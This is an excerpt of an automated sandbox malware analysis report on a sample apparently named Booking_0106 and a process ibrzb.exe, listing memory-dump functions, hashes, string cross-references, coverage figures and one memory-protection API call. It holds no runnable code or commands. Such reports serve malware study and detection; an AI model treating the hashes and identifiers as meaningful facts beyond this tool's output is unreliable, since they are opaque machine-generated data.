Source File: 00000002.00000002.2961100459.0000000002DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dbd000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ee20a804db6d8316cd8d24ad6ff6be92c3c5622d04f885793677d53c53c5457
Instruction ID: cb55cd8ec5760b4fd7b3470fb050737f5ec124d26fface074ffa3f88d0a12233
Opcode Fuzzy Hash: 3ee20a804db6d8316cd8d24ad6ff6be92c3c5622d04f885793677d53c53c5457
Instruction Fuzzy Hash: 2F2148715093C09FCB038B24D9A4751BF71AF46214F29C5DBD8898F2A7C33A980ACB62

Function 06BD6D88 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64a0c3560ef625b3a8ba691d00d490c2b154db28bab679a5a6b53f98f47f4bba
Instruction ID: 98f0f533ff30ef47718448f5917cf4a1a29e081591e16b8f2d6e4f43208f9b53
Opcode Fuzzy Hash: 64a0c3560ef625b3a8ba691d00d490c2b154db28bab679a5a6b53f98f47f4bba
Instruction Fuzzy Hash: BC21AF70F101189FDF84DA69E854A9EB7B6EB84314F208479E409EB380FB35EC418B84

Function 06BD3C60 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dc310874784ead0a196f4cdfac6bd2f0420e3689586990076e16965f639c59c
Instruction ID: 02be0d7ef5ecc291a68554664c2b89229031dadd314d2a96f9dbddb069ff0a03
Opcode Fuzzy Hash: 2dc310874784ead0a196f4cdfac6bd2f0420e3689586990076e16965f639c59c
Instruction Fuzzy Hash: 8111C471B141255FDF589A68D814AAF73EBEBC9310F04817AD80AEB340EE64DC428BD2

Function 02DAD4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2960961914.0000000002DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dad000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 98e43425f1cc931b28b6524c1e1b41f5dfe88dd9929367a7cce1d03427c04ba7
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: FB11D376504240CFCB16CF14D5C4B16BF72FB95318F24C6A9D9090B756C33AD85ACBA1

Function 06BD3E98 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24cae69058a83bda5c9b794b2671166015f7e9cb79d8e0f4890e828090b6ac3c
Instruction ID: a7baa56e16ca5ab63a69bfa0f4d2c899ff79268303e8e9b0a6ea35e4a743d4b4
Opcode Fuzzy Hash: 24cae69058a83bda5c9b794b2671166015f7e9cb79d8e0f4890e828090b6ac3c
Instruction Fuzzy Hash: 5A01F531B101051FCB61C66DA85471BB7DBCBCA710F108479E50ECB381E965CC0243E2

Function 06BDEE08 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bdc0d5ae6cf879264df35d843f1fc1079f8aba6789db6016969c60d532feb42
Instruction ID: cf5089b8cfa66bc9ef43251a46468b35c134301d20a0107d112da7dba043ef04
Opcode Fuzzy Hash: 2bdc0d5ae6cf879264df35d843f1fc1079f8aba6789db6016969c60d532feb42
Instruction Fuzzy Hash: 1901F735B204011BCBA5867CA860B6B77DBDBCAA10F148879E10ACF381EE12DC0343D5

Function 06BD3918 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab809bfb3bc87340a32943b0967231337090aeadda0bf6c3fea113f1abec4486
Instruction ID: c0b0004e0b3b399a6087e951409a9301f76121395e0d09ca3a82aa8dd299d189
Opcode Fuzzy Hash: ab809bfb3bc87340a32943b0967231337090aeadda0bf6c3fea113f1abec4486
Instruction Fuzzy Hash: 7021E0B5D01259AFCB00CF9AD884ACEFBB8FB49310F10852AE918B7201C374A950CFA5

Function 06BD3920 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 556edb37de41e5156deb9f691edafc6e8c69b027db504c64874ad497a71407e3
Instruction ID: e1418d386b5ebe650fe99b93c51706a454e5bebec1e67ed15bc8bfbecaa8123d
Opcode Fuzzy Hash: 556edb37de41e5156deb9f691edafc6e8c69b027db504c64874ad497a71407e3
Instruction Fuzzy Hash: 0C11C2B1D01259AFCB00DF9AD884ACEFBF4FB49310F10812AE918A7201D374A954CFA5

Function 06BD3EA8 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c752f18a189bdecf9de8f1e16d3c193aa58f82d8a100c7cb17cf8537c25de20d
Instruction ID: 72c84ec1d4c807a0bd298c188059c4d533edfc2005216ef8a7c86e0ce8f4e722
Opcode Fuzzy Hash: c752f18a189bdecf9de8f1e16d3c193aa58f82d8a100c7cb17cf8537c25de20d
Instruction Fuzzy Hash: AA01D171B100151BDB649A6DA450B1BB3DBDBCA710F209439F20ECB381EE66DC0243D6

Function 06BDA377 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb1665c57b63355896a4403d74d0489a5f1bdfc2d869cef14ea577bae7c99b82
Instruction ID: 84ea8928a63298af592fafd29f29d5721bcf4f6f5b30782f3126ee5bf54c7602
Opcode Fuzzy Hash: bb1665c57b63355896a4403d74d0489a5f1bdfc2d869cef14ea577bae7c99b82
Instruction Fuzzy Hash: A6018F71B111504FCBA1DA78E96471E77E7EB4A720F148469E10ACB391EE25DC828785

Function 06BD3C4F Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb2d76837c1e15f2f2383f41ff465648b406661b4f97b35bdc1c1c31abfc27fb
Instruction ID: 7145ecc0fed5b56844c2e81049dd69040195e732ea6e3cecfdec168998e8ed03
Opcode Fuzzy Hash: eb2d76837c1e15f2f2383f41ff465648b406661b4f97b35bdc1c1c31abfc27fb
Instruction Fuzzy Hash: 4301A271B141255BDF989A68EC107EF72EBDBC9204F18417AD50AE7280EE64CC824BD2

Function 06BDEE18 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6eb02ad7446690dc1e77054b7bef5d6f876d449e4522371048a8bd2f3f2ea80
Instruction ID: 58b65e5d8f9b973b7d141f3f9df55ccb5ca362da57d4f8a39dac79e96f3bf20e
Opcode Fuzzy Hash: f6eb02ad7446690dc1e77054b7bef5d6f876d449e4522371048a8bd2f3f2ea80
Instruction Fuzzy Hash: D9018C75B204111BCBA59A6DA860B2E63DBDBC9A10F109879E10ACF380EE25DC0347D5

Function 06BDA388 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a782fc90e9f2efb9ee1295e6fcbe4dfe0c585b5f3a42ed11d31f15750c11054
Instruction ID: 86e984fd51d0b4d68f5c116af669da81aae9d80e1461816be565bab81f6c1c29
Opcode Fuzzy Hash: 7a782fc90e9f2efb9ee1295e6fcbe4dfe0c585b5f3a42ed11d31f15750c11054
Instruction Fuzzy Hash: 4F018170B101104FCBA09A6DE854B1F73DBD789720F148878E10ECB340EE25DC828785

Function 06BDC850 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a9594d67f57eb0beb0f3a73ac3403e761273d9331f4ac404d4583a1d6179f75
Instruction ID: 3579292baa949992ca8d66ee55333a19090def57cc8b0157f744a83ec101f3b2
Opcode Fuzzy Hash: 2a9594d67f57eb0beb0f3a73ac3403e761273d9331f4ac404d4583a1d6179f75
Instruction Fuzzy Hash: 9C01A972E101245BCB549A65E840A99BB7AE784710F108479E505EB344EB76DC04CBD0

Function 06BD64E8 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b444cda3f38af36467d96961f14beefeb86a9a4fb19cfa4cc45ea7ac69332a1
Instruction ID: b43e9fa5571f559c24b2dba870b3fefb3ffd5b3a978dddf3fcb69dcc70978fee
Opcode Fuzzy Hash: 9b444cda3f38af36467d96961f14beefeb86a9a4fb19cfa4cc45ea7ac69332a1
Instruction Fuzzy Hash: C9E0D8F1D092489FDF60CF708E1434A3BB9DB0220CF2588E6C144DF102F135CA458781

Non-executed Functions

Function 06BD7710 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$^q, xrefs: 06BD7827
$^q, xrefs: 06BD7C8D
$^q, xrefs: 06BD7C77
$^q, xrefs: 06BD7C99
$^q, xrefs: 06BD7BD8
$^q, xrefs: 06BD7BE4
$^q, xrefs: 06BD781B
$^q, xrefs: 06BD784C
$^q, xrefs: 06BD7858
$^q, xrefs: 06BD7C83

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2222239885
Opcode ID: 5288c07525331ff5d625e99cc545d48f8fc7cd2e03e3fc5cfa8cdd8f957bc16c
Instruction ID: c038dac5755fa35f6c194a343b51bde2db3af9861c4941e38092c71c96991cfe
Opcode Fuzzy Hash: 5288c07525331ff5d625e99cc545d48f8fc7cd2e03e3fc5cfa8cdd8f957bc16c
Instruction Fuzzy Hash: 92122B70E002198FDB68DF65D854AADB7B2FF88304F2095A9D40AAB354EF319D85CF91

Function 06BDA9B0 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$^q, xrefs: 06BDAB38
$^q, xrefs: 06BDAAA6
$^q, xrefs: 06BDAB0D
$^q, xrefs: 06BDAB01
$^q, xrefs: 06BDAB6E
$^q, xrefs: 06BDAAB2
$^q, xrefs: 06BDAB62
$^q, xrefs: 06BDAB2C

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: f467833d0d9492eff61ae93a03697d8b4aa879442ccd40dde4a0342189d76592
Instruction ID: 85b385d25ca36452ffe72b5d5a4953356bae1c751b6e38c472f85c91e9ec0cef
Opcode Fuzzy Hash: f467833d0d9492eff61ae93a03697d8b4aa879442ccd40dde4a0342189d76592
Instruction Fuzzy Hash: 90919E70E002099FEB68DFA5D954B6EB7F2EF84310F248569E405AF394EB749D85CB80

Function 06BD7110 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$^q, xrefs: 06BD75AC
$^q, xrefs: 06BD7624
$^q, xrefs: 06BD7618
.5vq, xrefs: 06BD716B
$^q, xrefs: 06BD73F2
$^q, xrefs: 06BD7458
$^q, xrefs: 06BD744C

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-390881366
Opcode ID: 58f1a8c724b70dff6291fb2a271ed1047301150def3109a1f1a07019d8b0745b
Instruction ID: 524ffc3d4413e12036329e4e560d478f6dd08a0fc94ced40e0378b3ca290c018
Opcode Fuzzy Hash: 58f1a8c724b70dff6291fb2a271ed1047301150def3109a1f1a07019d8b0745b
Instruction Fuzzy Hash: 2EF11B74A40208CFDB59EFA9D554AAEB7B3FF84300F208568D4099B358EF759C86CB91

Function 06BD8448 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$^q, xrefs: 06BD8713
$^q, xrefs: 06BD86A2
$^q, xrefs: 06BD8707
$^q, xrefs: 06BD86AE

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 0e15e13849070a8bdbe3736caff14978e494c300d9e78d3f6df009d5bd452575
Instruction ID: 87ada7d33e904564d232ea09e4654efe251a79cd58781ea0c7aa30f231633a9e
Opcode Fuzzy Hash: 0e15e13849070a8bdbe3736caff14978e494c300d9e78d3f6df009d5bd452575
Instruction Fuzzy Hash: B9B15B70E002088FDB54EFA9D594AAEB7B3EF84311F24D469D00A9B354EB75DC86CB91

Function 06BD8860 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$^q, xrefs: 06BD88DF
LR^q, xrefs: 06BD8953
$^q, xrefs: 06BD88EB
LR^q, xrefs: 06BD89A2

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q
API String ID: 0-2454687669
Opcode ID: e9f8b6a4937f5b289813f98bef7f01051d6edf375e45998f3e6aacfd425886b9
Instruction ID: 079dfd36e6aa1373edcd159a849184cd5718ce85ff75720bfc48fc5366d2d166
Opcode Fuzzy Hash: e9f8b6a4937f5b289813f98bef7f01051d6edf375e45998f3e6aacfd425886b9
Instruction Fuzzy Hash: 2E51F270B002058FDB58DF68D940A6AB7F2FF85300F1495A8E4069F3A5EB35EC85CB91

Analysis Process: ibrzb.exePID: 7880, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	12.5%
Dynamic/Decrypted Code Coverage:	98.7%
Signature Coverage:	0%
Total number of Nodes:	228
Total number of Limit Nodes:	15

Executed Functions

Function 02A00E88 Relevance: 3.1, Strings: 2, Instructions: 588
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LR^q, xrefs: 02A00F60
\s^q, xrefs: 02A01145

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID: LR^q$\s^q
API String ID: 0-2586804783
Opcode ID: 56ae90fdb2418fde0619c0e8eb0763ecea40787477cec1189fcfc68ddf5343e4
Instruction ID: 9c2c07e56798c81b89d77baee82dbae62c3d3a4b837e612b15263191ba5fbe85
Opcode Fuzzy Hash: 56ae90fdb2418fde0619c0e8eb0763ecea40787477cec1189fcfc68ddf5343e4
Instruction Fuzzy Hash: AC327C75E052298FDB14CF79D990AADB7F2BF88304F158669D40AEB394DB30A941CF90

Function 02A035AB Relevance: 2.7, Strings: 2, Instructions: 167COMMON

Download Yara Rule

Strings

4'^q, xrefs: 02A0366F
4'^q, xrefs: 02A0369A

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 9662a1331cb86c8b7c82edc8dc456b0d949a6403b3e815c3dea74b166f881468
Instruction ID: 34094611b463249254ce6c33aa33e28855e223769e90fcc32d73843d44bfb024
Opcode Fuzzy Hash: 9662a1331cb86c8b7c82edc8dc456b0d949a6403b3e815c3dea74b166f881468
Instruction Fuzzy Hash: 8B712C74E452089FD749DF7AEA5469ABBF7BFC8304F14C479C0089B269EB3058168F81

Function 02A035B8 Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

4'^q, xrefs: 02A0366F
4'^q, xrefs: 02A0369A

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 694d5fa14dca4e7ed7c79004f0a18a02ec45a3d46c32f456d85690c3d2bee31d
Instruction ID: 6785c9fcf236986f217d71c247412104993713a374ca227d900ed4d29d6bcdd9
Opcode Fuzzy Hash: 694d5fa14dca4e7ed7c79004f0a18a02ec45a3d46c32f456d85690c3d2bee31d
Instruction Fuzzy Hash: BE711B74E452089FD749EF6AEA5469ABBF7BFC8304F14C439D0089B269EB3058168F91

Function 02A0A2A3 Relevance: 2.3, Strings: 1, Instructions: 1093COMMON

Download Yara Rule

Strings

2, xrefs: 02A0ADF0

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: b861ca757ccd4a96895d81350465685575c5a49cb9dba664a729257eba5b3b85
Instruction ID: 64844970661bbadae87f8bdac4a9c5d642d02746de32d3e0aa33eaf30a6c5672
Opcode Fuzzy Hash: b861ca757ccd4a96895d81350465685575c5a49cb9dba664a729257eba5b3b85
Instruction Fuzzy Hash: 77C2C474E01228CFCB65DF69D984B99BBB6BF88304F1081EAD509AB355DB309E85CF44

Function 02A017A8 Relevance: 1.6, Strings: 1, Instructions: 388COMMON

Download Yara Rule

Strings

LR^q, xrefs: 02A01B40

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: a74134dc37bfea775c8bf1c0f540892b22ef676405d322941e2fd5905f4ac1a2
Instruction ID: 64dd711b9621f4eb306193b89a604db4604611e40c4d536d5529104998238c5b
Opcode Fuzzy Hash: a74134dc37bfea775c8bf1c0f540892b22ef676405d322941e2fd5905f4ac1a2
Instruction Fuzzy Hash: A9F17C31E011298FDB14CB69D9D4BADBBF2BF88304F19C6A9D019AB295DB34D981CF50

Function 0575F50B Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0575F5C5

Memory Dump Source

Source File: 00000003.00000002.1863942641.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5750000_ibrzb.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 95a7bf9451201ba6e4e99b884dbdf9499bf0e94109a20be61b959b359b483636
Instruction ID: 86c80dec2da180b9923a8bde318b831c161f6457383c34a0f9f6959b2c0ee8db
Opcode Fuzzy Hash: 95a7bf9451201ba6e4e99b884dbdf9499bf0e94109a20be61b959b359b483636
Instruction Fuzzy Hash: C44177B5D042589FCF10CFAAD984ADEFBB1BB49320F10942AE819B7210D775A945CF68

Function 0575F510 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0575F5C5

Memory Dump Source

Source File: 00000003.00000002.1863942641.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5750000_ibrzb.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 79b01fd04c667b48a7f315ff43c90ed00a023e20977688ff99f0335780d6c39d
Instruction ID: a1f82a358e743d31e9c901abbe3cd3f5733b06a5b16d00a086574fdeb6ce4e5b
Opcode Fuzzy Hash: 79b01fd04c667b48a7f315ff43c90ed00a023e20977688ff99f0335780d6c39d
Instruction Fuzzy Hash: 3D4177B5D04258DFCF10CFAAD984ADEFBB1BB49320F10942AE819B7210D775A945CF68

Function 02A018A6 Relevance: 1.5, Strings: 1, Instructions: 218COMMON

Download Yara Rule

Strings

LR^q, xrefs: 02A01B40

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: eb679db49fe3afe19f8f37f5fcf7b6292fbf0e3332008de424ea87498760a7bf
Instruction ID: 88da63a93fe4cb2d69168e809b8a31a385a6c73ec7559e69126df960fea7ed33
Opcode Fuzzy Hash: eb679db49fe3afe19f8f37f5fcf7b6292fbf0e3332008de424ea87498760a7bf
Instruction Fuzzy Hash: CD914F31E011198FDB14DF69D9D0BADB7B3BF84304F29C5A9D009AB295DB34A982DF50

Function 02A00BB0 Relevance: 1.5, Strings: 1, Instructions: 212COMMON

Download Yara Rule

Strings

\s^q, xrefs: 02A00D23

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID: \s^q
API String ID: 0-4111632511
Opcode ID: 8db8c30316a8dd00fc57454519c6adad865cf21e3427cbe8ed5c871b11b4ce5f
Instruction ID: a038d3245438720ba630d0184b708235f558a53fbd9f8456d3691a25741015c3
Opcode Fuzzy Hash: 8db8c30316a8dd00fc57454519c6adad865cf21e3427cbe8ed5c871b11b4ce5f
Instruction Fuzzy Hash: 9181F778E4020E9FDF14CFA9E584ABEBBB1BF48314F10A655D416EB290DB31A941CF50

Function 02A0B69C Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32bf4591a2cdaf9b0371fc5e229c4baf2f50a63d1fe43144dc3b5213cfd978cc
Instruction ID: 1b2765f13cba8b1d285a811c66a0031189cbb092457fd6118db5daff8102b6d9
Opcode Fuzzy Hash: 32bf4591a2cdaf9b0371fc5e229c4baf2f50a63d1fe43144dc3b5213cfd978cc
Instruction Fuzzy Hash: 2832D274A00229CFCB65DF28D994AA9BBB6FF48304F1085E9E50DA7355DB30AE81CF54

Function 052D0678 Relevance: 3.7, Strings: 2, Instructions: 1219COMMON

Download Yara Rule

Strings

4'^q, xrefs: 052D1559
4'^q, xrefs: 052D1549

Memory Dump Source

Source File: 00000003.00000002.1862431988.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_52d0000_ibrzb.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: a6bb63ffe65b663fdd072b8643a4676f194e46706ab9641ccc31c0e0472da22d
Instruction ID: e550af3d2e002b547d3a3624415500a927fa58fa3216a653a58369768f0d8fc7
Opcode Fuzzy Hash: a6bb63ffe65b663fdd072b8643a4676f194e46706ab9641ccc31c0e0472da22d
Instruction Fuzzy Hash: BBB2B270D29389CFCB16CFA4D998BAEBFB5BF06300F14409AE505AB2A2D6745845CF71

Function 052D1DA8 Relevance: 3.0, Strings: 2, Instructions: 488
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 052D243B
4'^q, xrefs: 052D244B

Memory Dump Source

Source File: 00000003.00000002.1862431988.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_52d0000_ibrzb.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 034da7a904d6fa59c817070cc2c539e2f1ad75097dfd2cc466720a426a42626b
Instruction ID: 7093531d965b2010149eeb9c47801530c43ee57ccc08e93e046c8d7814886703
Opcode Fuzzy Hash: 034da7a904d6fa59c817070cc2c539e2f1ad75097dfd2cc466720a426a42626b
Instruction Fuzzy Hash: F822E734E15218CFCB64DFA4D5586ADFBB2FF89301F208469E80AAB295CB745D85CF60

Function 052D18C0 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 052D1D66
4'^q, xrefs: 052D1D56

Memory Dump Source

Source File: 00000003.00000002.1862431988.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_52d0000_ibrzb.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 408fe537d954e3e47b3187f02a761e82eb6d8900a50206933d651bfdf69cb24d
Instruction ID: d04b47be6fed09a02895e262fbeaaa58af28011704f7cf9374af4a40e876e8e4
Opcode Fuzzy Hash: 408fe537d954e3e47b3187f02a761e82eb6d8900a50206933d651bfdf69cb24d
Instruction Fuzzy Hash: 08F1D138E1521CDFCB28DFA4E5A86ADFBB2FF89311F205529E40AA7250DB745981CF50

Function 02A00868 Relevance: 1.4, Strings: 1, Instructions: 164COMMON

Download Yara Rule

